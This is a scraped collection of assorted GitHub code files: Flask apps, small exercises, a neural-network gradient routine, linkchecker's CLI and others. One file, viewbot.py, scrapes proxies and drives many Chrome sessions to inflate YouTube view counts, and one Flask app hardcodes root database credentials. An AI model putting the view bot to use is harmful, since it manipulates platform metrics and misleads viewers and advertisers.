支付宝支付\\n:')\ndef chck(mode):\n\tif mode=='1':\n\t\treturn '微信'\n\telse:\n\t\treturn '支付宝'\nprint('\\n=======================================\\n你最幸运!抽到了\\033[32m'+chck(mode)+'打款1000元\\033[0m(有机会)!\\n=======================================\\n')\ntime.sleep(ttttt)\nprint('\\n===============================\\n你是\\033[35m新用户\\033[0m,抽奖次数加2\\n')\ntime.sleep(ttttt)\nprint('你\\033[35m周围的用户\\033[0m抽中过奖,抽奖次数加3\\n')\ntime.sleep(ttttt)\nprint('你在\\033[35m幸运星期'+str(datetime.today().weekday()+1)+'\\033[0m抽奖,抽奖次数加2\\n===============================\\n')\ntime.sleep(ttttt)\nlevel_1()\nlevel_2()\nlevel_3()\nlevel_4()\ncan(10)","repo_name":"wzk0/pdd_demo","sub_path":"pdd.py","file_name":"pdd.py","file_ext":"py","file_size_in_byte":4787,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"26648857538","text":"from flask import Flask\nfrom flask import render_template\nfrom flask import request\nfrom flask import url_for\nfrom flask import redirect\nfrom flask_sqlalchemy import SQLAlchemy\n\napp = Flask(__name__)\n\napp.config['SQLALCHEMY_DATABASE_URI']='mysql+pymysql://root:12345@localhost/cadjogadores'\ndb = SQLAlchemy(app)\n\n\nclass cadjogadores(db.Model):\n __tablename__ = 'jogadores'\n _id = db.Column(db.Integer,primary_key=True,autoincrement=True)\n nome = db.Column(db.String(50))\n idade = db.Column(db.Integer())\n posicao = db.Column(db.String(30))\n altura = db.Column(db.Float(5))\n peso = db.Column(db.Float(5))\n def __init__(self, nome, idade, posicao, altura, peso):\n self.nome = nome\n self.idade = idade\n self.posicao = posicao\n self.altura = altura\n self.peso = peso\n\ndb.create_all()\n\n@app.route(\"/\")\n@app.route(\"/index\")\ndef index():\n return render_template(\"index.html\")\n\n@app.route(\"/pontuacao\")\ndef pontuacao():\n return render_template(\"pontuacao.html\")\n\n@app.route(\"/time\")\ndef times():\n return render_template(\"time.html\")\n\n@app.route(\"/jogadores\")\ndef jogadores():\n return render_template(\"jogadores.html\")\n\n@app.route(\"/cadastro\")\ndef cadastro():\n return render_template(\"cadastro.html\")\n\n@app.route(\"/cadastrar\", methods=['GET','POST'])\ndef cadastrar():\n if request.method ==\"POST\":\n nome = (request.form.get(\"nome\"))\n idade = (request.form.get(\"idade\"))\n posicao = (request.form.get(\"posicao\"))\n altura = (request.form.get(\"altura\"))\n peso = (request.form.get(\"peso\"))\n if nome:\n f = cadjogadores(nome,idade,posicao,altura,peso)\n db.session.add(f)\n db.session.commit()\n return redirect(url_for(\"cadastro\"))\n\nif __name__ == \"__main__\":\n app.run(debug=True)","repo_name":"Lucas-Mendes04/AC05_Desenvolvimento","sub_path":"principal.py","file_name":"principal.py","file_ext":"py","file_size_in_byte":1819,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13423712016","text":"# Задача 4- Электричка отправляется в h1:m1 и едет h2:m2. Выведите время прибытия электрички на\n#электронных часах в формате hh:mm.Формат входных данных: на одной строке h1:m1, на другой h2:m2\nimport datetime\n\nh1m1 = input('Input the departure time (format HH:MM, e.g. 13:30)... ')\nh2m2 = [int(i) for i in (input('Input the time on the way (format HH:MM, e.g. 13:30)... 
').split(':'))] \n\ndeparture = datetime.datetime.strptime(h1m1, '%H:%M')\nway = datetime.timedelta(hours=h2m2[0], minutes=h2m2[1]) \narrival = departure + way\n\nprint(f\"Arrival time is {arrival.strftime('%H:%M')}\")","repo_name":"DmitryDemidovets/Homeworks","sub_path":"HW4 18.12/4. h1m1.py","file_name":"4. h1m1.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24850024907","text":"two_data = open(\"2\", \"r\")\nlines = two_data.readlines()\n\nscores = {\n \"A X\" : 4, # Rock / Rock / Draw\n \"A Y\" : 8, # Rock / Paper / Win\n \"A Z\" : 3, # Rock / Scissors / Loss\n \"B X\" : 1, # Paper / Rock / Loss\n \"B Y\" : 5, # Paper / Paper / Draw\n \"B Z\" : 9, # Paper / Scissors / Win\n \"C X\" : 7, # Scissors / Rock / Win\n \"C Y\" : 2, # Scissors / Paper / Loss\n \"C Z\" : 6, # Scissors / Scissors / Draw\n}\n\nstrategies = {\n \"A X\" : 3, # Rock / Lose (Scissors)\n \"A Y\" : 4, # Rock / Draw (Rock)\n \"A Z\" : 8, # Rock / Win (Paper)\n \"B X\" : 1, # Paper / Lose (Rock)\n \"B Y\" : 5, # Paper / Draw (Paper)\n \"B Z\" : 9, # Paper / Win (Scissors)\n \"C X\" : 2, # Scissors / Lose (Paper)\n \"C Y\" : 6, # Scissors / Draw (Scissors)\n \"C Z\" : 7, # Scissors / Win (Rock)\n}\n\nscore = 0\nstrategy = 0\nfor line in lines:\n stripped = line.strip(\"\\n\") # get rid of any new lines\n score += scores[stripped]\n strategy += strategies[stripped]\n\nprint(\"Puzzle One: \" + str(score))\nprint(\"Puzzle Two: \" + str(strategy))\n\ntwo_data.close()","repo_name":"mr-velse/AoC2022","sub_path":"DayTwo.py","file_name":"DayTwo.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33948506168","text":"from socket import gethostname\nfrom collections import OrderedDict\n\n\nclass AddressMapper(object):\n \"\"\" Class used for storage of the addresses defined in the configuration file.\n These addresses are expected to be host names or IP addresses where a Supvisors instance is running.\n The instance holds:\n - logger: a reference to the common logger,\n - addresses: the list of addresses defined in the Supvisors configuration file,\n - local_addresses: the list of known aliases of the current host, i.e. the host name and the IPv4 addresses,\n - local_address: the usage name of the current host, i.e. the name in the known aliases that corresponds to an address of the Supvisors list. \"\"\"\n\n def __init__(self, logger):\n \"\"\" Initialization of the attributes. \"\"\"\n # keep reference of common logger\n self.logger = logger\n # init\n self._addresses = []\n self.local_addresses = [gethostname()] + self.ipv4()\n self.local_address = None\n\n @property\n def addresses(self):\n \"\"\" Property for the 'address' attribute.\n The setter stores the addresses of the configuration file and determine the usage name of the local address. \"\"\"\n return self._addresses\n\n @addresses.setter\n def addresses(self, addr):\n self.logger.info('Expected addresses: {}'.format(addr))\n # store IP list as found in config file\n self._addresses = addr\n # get IP list for local board\n self.local_address = self.expected(self.local_addresses)\n self.logger.info('Local addresses: {} - Local address: {}'.format(self.local_addresses, self.local_address))\n \n def valid(self, address):\n \"\"\" Return True if address is among the addresses defined in the configuration file. 
\"\"\"\n return address in self._addresses\n\n def filter(self, address_list):\n \"\"\" Returns a list of expected addresses from a list of names or ip addresses identifying different locations. \"\"\"\n # filter unknown addresses\n addresses = [address for address in address_list if self.valid(address)]\n # remove duplicates keeping the same ordering\n return list(OrderedDict.fromkeys(addresses))\n\n def expected(self, address_list):\n \"\"\" Returns the expected address from a list of names or ip addresses identifying the same location. \"\"\"\n return next((address for address in address_list if self.valid(address)), None)\n\n @staticmethod\n def ipv4():\n \"\"\" Get all IPv4 addresses for all interfaces. \"\"\"\n try:\n from netifaces import interfaces, ifaddresses, AF_INET\n # to not take into account loopback addresses (no interest here)\n addresses = []\n for interface in interfaces():\n config = ifaddresses(interface)\n # AF_INET is not always present\n if AF_INET in config.keys():\n for link in config[AF_INET]:\n # loopback holds a 'peer' instead of a 'broadcast' address\n if 'addr' in link.keys() and 'peer' not in link.keys():\n addresses.append(link['addr']) \n return addresses\n except ImportError:\n return []\n\n","repo_name":"danh1979/supvisors","sub_path":"supvisors/addressmapper.py","file_name":"addressmapper.py","file_ext":"py","file_size_in_byte":3282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"23254099021","text":"# analysis_module.py\n\n# Other necessary imports\nimport pandas as pd\n\nfrom analysis.evaluate_recommendation import evaluate_recommendation, get_actual_price_changes\n# Import necessary functions from the 'analysis' module\nfrom analysis.evaluation_function import evaluate_performance, get_last_percentage_change\nfrom analysis.make_recommendation import make_recommendation, get_price_trend, get_market_sentiment\nfrom analysis.track_performance import track_performance\n\n\ndef analysis_pipeline():\n # Read historical data from CSV file\n historical_data = pd.read_csv('data/historical_data.csv')\n\n # Evaluate performance and calculate indicators\n indicators = evaluate_performance(historical_data)\n\n # Calculate the last percentage change in price\n last_percentage_change = get_last_percentage_change(historical_data)\n\n # Get price trend and market sentiment\n price_trend = get_price_trend(historical_data)\n market_sentiment = get_market_sentiment(historical_data)\n\n # Make a recommendation based on indicators\n recommendation = make_recommendation(current_price)\n\n # Get actual price changes\n actual_price_changes = get_actual_price_changes(historical_data)\n\n # Evaluate the recommendation\n evaluation = evaluate_recommendation(current_price)\n\n # Track the performance\n past_recommendations = []\n track_performance(evaluation, past_recommendations)\n\n\n# Run the analysis pipeline\nif __name__ == \"__main__\":\n analysis_pipeline()\n","repo_name":"tsanford01/BitcoinAnalyzer","sub_path":"analysis_module.py","file_name":"analysis_module.py","file_ext":"py","file_size_in_byte":1480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19671164324","text":"from selenium import webdriver\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.common.proxy import Proxy, ProxyType\nfrom selenium.webdriver.common.desired_capabilities import DesiredCapabilities\nimport numpy\nimport socket\nimport pylint\nimport 
os\nimport re\nimport time\nfrom selenium.webdriver.support.select import Select\nimport threading\nimport random\n\nPATH = \"C:\\Program Files (x86)\\chromedriver.exe\"\nprefs = {\"profile.managed_default_content_settings.images\": 2}\niplist = []\noptions = webdriver.ChromeOptions()\ndriverarray = []\nnbrofChrome = 30\n\n\ndef get_PROXY(): #RENVOI UNE LIST DE PROXY EN 8080\n #RECUPERE UNE LISTE DE PROXY\n PROXYPATH = \"https://spys.one/free-proxy-list/FR/\"\n proxyDriver = webdriver.Chrome(PATH)\n proxyDriver.get(PROXYPATH)\n time.sleep(3)\n #PREPARATION DE LA PAGE POUR 500 ELEMENT PORT 8080\n portelement = Select(proxyDriver.find_element_by_name(\"xf4\"))\n portelement.select_by_visible_text(\"8080\")\n time.sleep(3)\n showelement = Select(proxyDriver.find_element_by_name(\"xpp\"))\n showelement.select_by_visible_text(\"500\")\n time.sleep(3)\n proxyDriver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n time.sleep(3)\n ipelement = proxyDriver.find_elements_by_class_name(\"spy14\")\n\n i = 0\n #ON NE RECUPERE QUE LES ADRESSE DANS IPLIST\n line = \"\"\n r = re.compile(r'[0-9]+(?:\\.[0-9]+){3}:8080')\n for line in ipelement:\n if (r.match(line.text)):\n iplist.append(line.text)\n\n\n print(\"FOUND \"+ str(len(iplist))+ \" PROXY\")\n proxyDriver.close()\n\ndef clean_PROXY():\n\n for line in iplist:\n ip = line.split(\":\")[0]\n print(ip)\n response = os.system(\"ping -n 1 \" + ip)\n if response == 0:\n print(\" STATUS = OK\")\n else:\n iplist.remove(line)\n print(\" STATUS = REJECTED\")\n print(\"FOUND \"+ str(len(iplist))+ \" GOOD PROXY\")\n\n\ndef go_VIDEO(crDriver):\n video = \"https://www.youtube.com/watch?v=x9_KhDiD_oA\"\n \n while True: \n try:\n crDriver.get(video)\n break\n except Exception as e:\n driverarray.remove(crDriver)\n crDriver.close()\n print(e)\n\n random.seed(a=None, version=2)\n rd = random.randint(0,len(iplist)-1)\n\n options.add_experimental_option(\"prefs\", prefs)\n options.add_argument('--proxy-server=%s' % iplist[rd])\n crDriver = webdriver.Chrome(PATH, chrome_options = options) #creation du driver avec proxy\n driverarray.append(crDriver)\n\n return \n\n\nget_PROXY()\nclean_PROXY()\n\n\n\ni = 0\nj = 0\nwhile (i len(iplist)):\n j=0\n i = i+1\n\n\ntime.sleep(1)\n\n\nthreeadlist = []\n\nfor crDriver in driverarray:\n crThread = threading.Thread(target=go_VIDEO, args=[crDriver])\n crThread.start()\n threeadlist.append(crThread)\n\n \ntime.sleep(100)","repo_name":"ForerunnerofRivia/BotYoutube","sub_path":"viewbot.py","file_name":"viewbot.py","file_ext":"py","file_size_in_byte":3179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73256183849","text":"from flask.views import MethodView\nfrom flask import request,jsonify,current_app\nfrom .. import responses\nfrom ...models.cs_models import SensorGroup\nfrom ... 
import r,oauth\nfrom ..helper import xstr,get_building_choices\nimport sys\n\nclass SensorGroupService(MethodView):\n\n @oauth.require_oauth()\n def post(self):\n \"\"\"\n Args as data:\n name = \n description = \n building = \n\n Returns (JSON) :\n {\n \"success\" : \n \"error\" : \n }\n \"\"\"\n try:\n data = request.get_json()\n name = data['name']\n building = data['building']\n description = data['description']\n except KeyError:\n return jsonify(responses.missing_parameters)\n\n sensor_group = SensorGroup.objects(name=name).first()\n if sensor_group:\n return jsonify(responses.sensorgroup_exists)\n\n # Get the list of buildings and verify that the one specified in the\n # request exists\n buildings_list = get_building_choices('rest_api')\n for item in buildings_list:\n if building in item:\n SensorGroup(name=xstr(name), building=xstr(building),\n description=xstr(description)).save()\n return jsonify(responses.success_true)\n\n return jsonify(responses.invalid_building)\n\n @oauth.require_oauth()\n def get(self,name):\n \"\"\"\n Args as data:\n name = \n Returns (JSON):\n {\n \"success\" : \n \"error\" : \n \"building\" : \n \"description\" : < description attached to sensor group\"\n }\n \"\"\"\n sensor_group = SensorGroup.objects(name=name).first()\n if sensor_group is None:\n return jsonify(responses.invalid_sensorgroup)\n\n response = dict(responses.success_true)\n response.update({\"name\":sensor_group['name'],\n \"building\":sensor_group['building'],\n \"description\":sensor_group['description']})\n return jsonify(response)\n","repo_name":"Entromorgan/GIoTTo","sub_path":"BuildingDepot-v3.2.8/buildingdepot/CentralService/app/rest_api/sensorgroups/sensorgroup.py","file_name":"sensorgroup.py","file_ext":"py","file_size_in_byte":2444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41858655606","text":"# [Simulation] 컨베이어 벨트 위의 로봇 - 백준 20055 삼성기출\nimport copy\n\n\nN, K = list(map(int,input().split()))\n\n\n# 내구도\nA = list(map(int,input().split()))\n\n\n\n# 로봇의 위치\nrobot = []\nprint(len(robot))\n\n\n# 벨트가 회전한다.\ndef lotation():\n\n temp = copy.deepcopy(A)\n\n for i in range(len(A)):\n\n nx = i + 1\n if(nx >= 2*N):\n nx = 0\n A[nx] = temp[i]\n\n #\n # for i in range(len(robot)):\n #\n # cx = robot[i][0]\n # nx = cx + 1\n #\n # if(cx == 0):\n # continue\n # if(nx >= 2*N + 1):\n # robot[i][0] = 0\n # continue\n # #nx = 0\n #\n #\n # # 다음칸의 내구도가 0이거나, 로봇이 있으면\n # if(A[nx] == 0):\n # continue\n # break_boolean = False\n # for j in range(len(robot)):\n # pre_robot = robot[j][0]\n # if(pre_robot == nx):\n # break_boolean = True\n # break\n # if(break_boolean == True):\n # continue\n #\n # robot[i][0] = nx\n # A[nx] = A[nx]-1\n # print('1 lotation robot =', robot)\n # print('1 lotation A=', A)\n\n\n# 올라가는 위치에 로봇이 없으면 로봇을 올린다\ndef makeRobot():\n make_boolean = True\n for i in range(len(robot)):\n if(robot[i][0]==1):\n make_boolean = False\n break\n\n if(make_boolean == True and A[1] > 0):\n robot.append([1])\n #if(A[1] > 0):\n A[1] = A[1] - 1\n print('2 makeRobot robot =', robot)\n\ndef chkA():\n print('3 makeRobot A=', A)\n cnt = 0\n global finish_boolean\n finish_boolean = False\n for i in range(len(A)):\n if(A[i] == 0):\n cnt += 1\n print('cnt=',cnt)\n if(cnt >= K):\n finish_boolean = True\n break\n\n\nfinish_boolean = False\nresult = 0\n\nwhile(finish_boolean == False):\n print('result =',result)\n lotation()\n makeRobot()\n chkA()\n result += 1\n print('--------')\n\n\nprint(result - 
1)\n\n","repo_name":"908jyw/pythonAlgorithm","sub_path":"simulation/robotOnConveyerBelt.py","file_name":"robotOnConveyerBelt.py","file_ext":"py","file_size_in_byte":2058,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30652879463","text":"import numpy as np\n\nimport sys\n\nsys.path += [\"layers\"]\nsys.path += [\"pyc_code\"]\n\nfrom fn_conv import fn_conv\nfrom fn_flatten import fn_flatten\nfrom pyc_code.fn_linear_ import fn_linear\nfrom fn_pool import fn_pool\nfrom fn_relu import fn_relu\nfrom pyc_code.fn_softmax_ import fn_softmax\n\n\ndef calc_gradient(model, input, layer_acts, dv_output):\n \"\"\"\n Calculate the gradient at each layer, to do this you need dv_output\n determined by your loss function and the activations of each layer.\n The loop of this function will look very similar to the code from\n inference, just looping in reverse.\n Args:\n model: Dictionary holding the model\n input: [any dimensions] x [batch_size]\n layer_acts: A list of activations of each layer in model[\"layers\"]\n dv_output: The partial derivative of the loss with respect to each element in the output matrix of the last layer.\n Returns:\n grads: A list of gradients of each layer in model[\"layers\"]\n \"\"\"\n num_layers = len(model[\"layers\"])\n grads = [\n None,\n ] * num_layers\n\n # TODO: Determine the gradient at each layer.\n # Remember that back-propagation traverses\n # the model in the reverse order.\n layers = model[\"layers\"]\n\n new_dv_output = dv_output\n for i in np.flip(range(num_layers)):\n if i > 0:\n activations = layer_acts[i - 1]\n else:\n activations = input\n\n def conv():\n # print(\"Conv activations:\", activations)\n # print(\"Conv dv_output:\", new_dv_output)\n grads = fn_conv(\n activations,\n layers[i][\"params\"],\n layers[i][\"hyper_params\"],\n backprop=True,\n dv_output=new_dv_output,\n )\n # print(\"Conv gradients:\", grads)\n return grads\n\n def flatten():\n return fn_flatten(\n activations,\n layers[i][\"params\"],\n layers[i][\"hyper_params\"],\n backprop=True,\n dv_output=new_dv_output,\n )\n\n def linear():\n return fn_linear(\n activations,\n layers[i][\"params\"],\n layers[i][\"hyper_params\"],\n backprop=True,\n dv_output=new_dv_output,\n )\n\n def pool():\n return fn_pool(\n activations,\n layers[i][\"params\"],\n layers[i][\"hyper_params\"],\n backprop=True,\n dv_output=new_dv_output,\n )\n\n def relu():\n return fn_relu(\n activations,\n layers[i][\"params\"],\n layers[i][\"hyper_params\"],\n backprop=True,\n dv_output=new_dv_output,\n )\n\n def softmax():\n return fn_softmax(\n activations,\n layers[i][\"params\"],\n layers[i][\"hyper_params\"],\n backprop=True,\n dv_output=new_dv_output,\n )\n\n switcher = {\n \"conv\": conv,\n \"flatten\": flatten,\n \"linear\": linear,\n \"pool\": pool,\n \"relu\": relu,\n \"softmax\": softmax,\n }\n\n def switch(type):\n return switcher.get(type)()\n\n _, new_dv_output, grads[i] = switch(layers[i][\"type\"])\n\n return grads\n","repo_name":"baroodya/cos429-a3","sub_path":"initial/calc_gradient.py","file_name":"calc_gradient.py","file_ext":"py","file_size_in_byte":3449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27030046635","text":"import os\nimport pprint\nimport signal\nimport sys\nimport traceback\n\nfrom .arg_parser import ArgParser\nfrom .setup_config import setup_config\n\nfrom .. import configuration\nfrom .. import fileutil\nfrom .. import log\nfrom .. import logconf\nfrom .. 
import LinkCheckerError\nfrom ..cmdline import aggregate_url, print_usage\nfrom ..director import console, check_urls, get_aggregate\nfrom ..logconf import LOG_CHECK, LOG_CMDLINE, LOG_THREAD\nfrom ..strformat import stripurl\n\n\ndef drop_privileges():\n \"\"\"Make sure to drop root privileges on POSIX systems.\"\"\"\n if os.name != 'posix':\n return\n if os.geteuid() == 0:\n log.warn(\n LOG_CHECK,\n _(\n \"Running as root user; \"\n \"dropping privileges by changing user to nobody.\"\n ),\n )\n import pwd\n\n os.seteuid(pwd.getpwnam('nobody')[3])\n\n\ndef linkchecker():\n if hasattr(signal, \"SIGUSR1\"):\n # install SIGUSR1 handler\n from ..decorators import signal_handler\n\n @signal_handler(signal.SIGUSR1)\n def print_threadstacks(sig, frame):\n \"\"\"Print stack traces of all running threads.\"\"\"\n log.warn(LOG_THREAD, \"*** STACKTRACE START ***\")\n for threadId, stack in sys._current_frames().items():\n log.warn(LOG_THREAD, \"# ThreadID: %s\" % threadId)\n for filename, lineno, name, line in traceback.extract_stack(stack):\n log.warn(\n LOG_THREAD,\n 'File: \"%s\", line %d, in %s' % (filename, lineno, name)\n )\n line = line.strip()\n if line:\n log.warn(LOG_THREAD, \" %s\" % line)\n log.warn(LOG_THREAD, \"*** STACKTRACE END ***\")\n\n logconf.init_log_config()\n\n # optional modules\n has_argcomplete = fileutil.has_module(\"argcomplete\")\n has_profile = fileutil.has_module(\"yappi\")\n has_meliae = fileutil.has_module(\"meliae\")\n\n # default profiling filename\n _profile = \"linkchecker.prof\"\n\n def read_stdin_urls():\n \"\"\"Read list of URLs, separated by white-space, from stdin.\"\"\"\n num = 0\n while True:\n lines = sys.stdin.readlines(8 * 1024)\n if not lines:\n break\n for line in lines:\n for url in line.split():\n num += 1\n if num % 10000 == 0:\n log.info(LOG_CMDLINE, \"Read %d URLs from stdin\", num)\n yield url\n\n # instantiate command line option parser\n argparser = ArgParser()\n\n # build a config object for this check session\n config = configuration.Configuration()\n config.set_status_logger(console.StatusLogger())\n\n # ================= auto completion =====================\n if has_argcomplete:\n import argcomplete\n\n argcomplete.autocomplete(argparser)\n\n # read and parse command line options and arguments\n options = argparser.parse_args()\n # configure application logging\n if options.debug:\n allowed_debugs = logconf.lognames.keys()\n for _name in options.debug:\n if _name not in allowed_debugs:\n print_usage(_(\"Invalid debug level %(level)r\") % {\"level\": _name})\n logconf.set_debug(options.debug)\n elif options.quiet:\n logconf.reset_loglevel()\n log.debug(\n LOG_CMDLINE,\n _(\"Python %(version)s on %(platform)s\")\n % {\"version\": sys.version, \"platform\": sys.platform},\n )\n # read configuration files\n try:\n files = []\n if options.configfile:\n path = configuration.normpath(options.configfile)\n if os.path.isfile(path):\n files.append(path)\n else:\n log.warn(\n LOG_CMDLINE, _(\"Unreadable config file: %r\"), options.configfile)\n config.read(files=files)\n except LinkCheckerError as msg:\n # config error\n print_usage(str(msg))\n drop_privileges()\n # set up config object using options\n setup_config(config, options)\n # now sanitize the configuration\n config.sanitize()\n\n log.debug(LOG_CMDLINE, \"configuration: %s\", pprint.pformat(sorted(config.items())))\n\n # prepare checking queue\n aggregate = get_aggregate(config)\n if options.trace:\n # enable thread tracing\n config[\"trace\"] = True\n # start trace in mainthread\n from .. 
import trace\n\n trace.trace_filter([r\"^linkcheck\"])\n trace.trace_on()\n # add urls to queue\n if options.stdin:\n for url in read_stdin_urls():\n aggregate_url(aggregate, url)\n elif options.url:\n for url in options.url:\n aggregate_url(aggregate, stripurl(url))\n else:\n log.warn(LOG_CMDLINE, _(\"no files or URLs given\"))\n # set up profiling\n do_profile = False\n if options.profile:\n if has_profile:\n if os.path.exists(_profile):\n print(\n _(\n \"Overwrite profiling file %(file)r?\\n\"\n \"Press Ctrl-C to cancel, RETURN to continue.\"\n )\n % {\"file\": _profile}\n )\n try:\n input()\n except KeyboardInterrupt:\n print(\"\", _(\"Canceled.\"), file=sys.stderr, sep=\"\\n\")\n sys.exit(1)\n do_profile = True\n else:\n log.warn(\n LOG_CMDLINE,\n _(\n \"The `yappi' Python module is not installed,\"\n \" therefore the --profile option is disabled.\"\n ),\n )\n\n # finally, start checking\n if do_profile:\n import yappi\n\n yappi.start()\n check_urls(aggregate)\n yappi.stop()\n yappi.get_func_stats().save(_profile)\n else:\n check_urls(aggregate)\n if config[\"debugmemory\"]:\n from .. import memoryutil\n\n if has_meliae:\n log.info(LOG_CMDLINE, _(\"Dumping memory statistics...\"))\n filename = memoryutil.write_memory_dump()\n message = _(\"The memory dump has been written to `%(filename)s'.\")\n log.info(LOG_CMDLINE, message % dict(filename=filename))\n else:\n log.warn(LOG_CMDLINE, memoryutil.MemoryDebugMsg)\n\n stats = config[\"logger\"].stats\n # on internal errors, exit with status 2\n if stats.internal_errors:\n sys.exit(2)\n # on errors or printed warnings, exit with status 1\n if stats.errors or (stats.warnings_printed and config[\"warnings\"]):\n sys.exit(1)\n","repo_name":"linkchecker/linkchecker","sub_path":"linkcheck/command/linkchecker.py","file_name":"linkchecker.py","file_ext":"py","file_size_in_byte":6668,"program_lang":"python","lang":"en","doc_type":"code","stars":774,"dataset":"github-code","pt":"53"} +{"seq_id":"27721333598","text":"#!/usr/bin/python3\n\nletters = [\"A\", \"B\", \"C\", \"D\", \"E\", \"F\", \"G\", \"H\", \"I\", \"J\", \"K\", \"L\", \"M\", \"N\", \"O\", \"P\", \"Q\", \"R\", \"S\", \"T\", \"U\", \"V\", \"W\", \"X\", \"Y\", \"Z\"]\npoints = [1, 3, 3, 2, 1, 4, 2, 4, 1, 8, 5, 1, 3, 4, 1, 3, 10, 1, 1, 1, 1, 4, 4, 8, 4, 10]\n\nletter_to_points = {key:val for key, val in zip(letters, points)}\nletter_to_points[\" \"] = 0\n#for key, val in zip(letters, points):\n#\tprint(f\"{key} = {val} pts\")\n\ndef score_word(word):\n\tpoint_total = 0\n\tfor char in word:\n\t\tif char.upper() in letter_to_points:\n\t\t\tpoint_total += int(letter_to_points.get(char.upper()))\n\t\telse:\n\t\t\tpoint_total += 0\n#\tprint(f\"Point total for {word} is {point_total}\")\n\treturn point_total\n\t\ndef play_word(player, word):\n\tglobal player_to_words\n\tplayer_to_words[player].append(word)\n\t\nplayer_to_words = {\t'player1' : [\"BLUE\", \"TENNIS\", \"EXIT\"],\n \t\t'wordNerd' : [\"EARTH\", \"EYES\", \"MACHINE\"],\n \t\t'Lexi Con' : [\"ERASER\", \"BELLY\", \"HUSKY\"],\n \t\t'Prof Reader' : [\"ZAP\", \"COMA\", \"PERIOD\"] }\n\ndef update_point_totals():\n\tglobal player_to_words\n\tplayer_to_points = {}\n\tfor player in player_to_words:\n\t\tplayer_points = 0\n\t\twords = player_to_words[player]\n\t\tfor word in words:\n\t\t\tplayer_points += score_word(word)\n\t\tplayer_to_points[player] = player_points\n\t\tprint(f\"{player} has {player_to_points[player]} pts.\")\n\nplay_word(\"player1\", 
\"SCOPA\")\nupdate_point_totals()\nprint(player_to_words[player])\n","repo_name":"cpm260/ITP270","sub_path":"scrabble.py","file_name":"scrabble.py","file_ext":"py","file_size_in_byte":1406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32963758968","text":"import json\nfrom django.db.models.fields import BooleanField\nfrom django.http import request\nfrom django.shortcuts import render\nfrom django.http.response import JsonResponse\nfrom django.views import View\nfrom django.utils.decorators import method_decorator\nfrom django.views.decorators.csrf import csrf_exempt\nfrom .models import Biker_Profile, OrderBiker\nfrom cart.models import CartSystem\nfrom user.models import User\n# Create your views here.\n\n@method_decorator(csrf_exempt, name = 'dispatch')\nclass BIKER(View):\n #add-biker-info\n #error here\n def post(self, request):\n try:\n data = json.loads(request.body.decode('utf-8'))\n profile = {}\n names = Biker_Profile._meta.fields\n for i in names:\n profile[i.name] = data.get(i.name)\n \n x = Biker_Profile.objects.create(**profile)\n response = {\"response\":True,\n 'msg':'ADDED'}\n return JsonResponse(response)\n except Exception as e:\n response = {\"response\":False,\n 'msg':str(e)}\n return JsonResponse(response)\n\n\n \n #GET ALL THROUGH DELIVERY STATUS using delivery condition\n #get-orders-status/\n def get(self,request,status):\n try:\n all_data = OrderBiker.objects.filter(delivery_status = status)\n \n msg = []\n for data in all_data:\n x = CartSystem.objects.get(pk =data.order_id_to_biker_id )\n profile = Biker_Profile.objects.get(pk = data.biker_id_id)\n msg.append({\n \"id\":data.pk,\n 'user name': User.objects.get(pk = x.user_id_id).name,\n 'delivery_status':data.delivery_status,\n 'address':data.address,\n 'contact':data.contact,\n 'biker_data':{\n 'order_id': x.order_id,\n 'name': profile.name,\n 'contact':profile.number\n \n }\n })\n\n information = {\"msg\":msg}\n return JsonResponse(information)\n except Exception as e:\n return JsonResponse({\"msg\":str(e)})\n\n '''\n put function to make the order now-delivering / in-delivering\n from table cart-system and biker-order\n This function is used by the biker, to make the \n order column delivery_status\n \n '''\n # put-delivery-status\n def put(self,request):\n try:\n data = json.loads(request.body.decode(\"utf-8\"))\n status = data.get('delivery_status')\n cart_system = CartSystem.objects.get(pk = data.get(\"cart_id\"))\n orderbiker = OrderBiker.objects.get(pk = data.get('id'))\n\n old_status = orderbiker.delivery_status\n #--- updating the cart\n cart_system.delivery_status = status\n cart_system.save()\n \n orderbiker.delivery_status = status\n\n orderbiker.save()\n #print(data.get('cart_id'))\n #print(cart_system.order_id)\n #print(orderbiker.delivery_status)\n #print(cart_system.delivery_staus)\n msg = {\"msg\":f\"status updated from {old_status} to {status}\",\n 'reponse':200}\n return JsonResponse(msg)\n\n except Exception as e:\n msg = {\"msg\":f\"status updated from {old_status} to {status}\",\n 'response':500}\n return JsonResponse(msg)\n ","repo_name":"muhammad-usman147/GroceryApp-Python-Flutter","sub_path":"grocery/biker/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73037022887","text":"import numpy as np\nfrom resspect.batch_functions import *\n\ndef batch_queries_uncertainty(class_probs, id_name, 
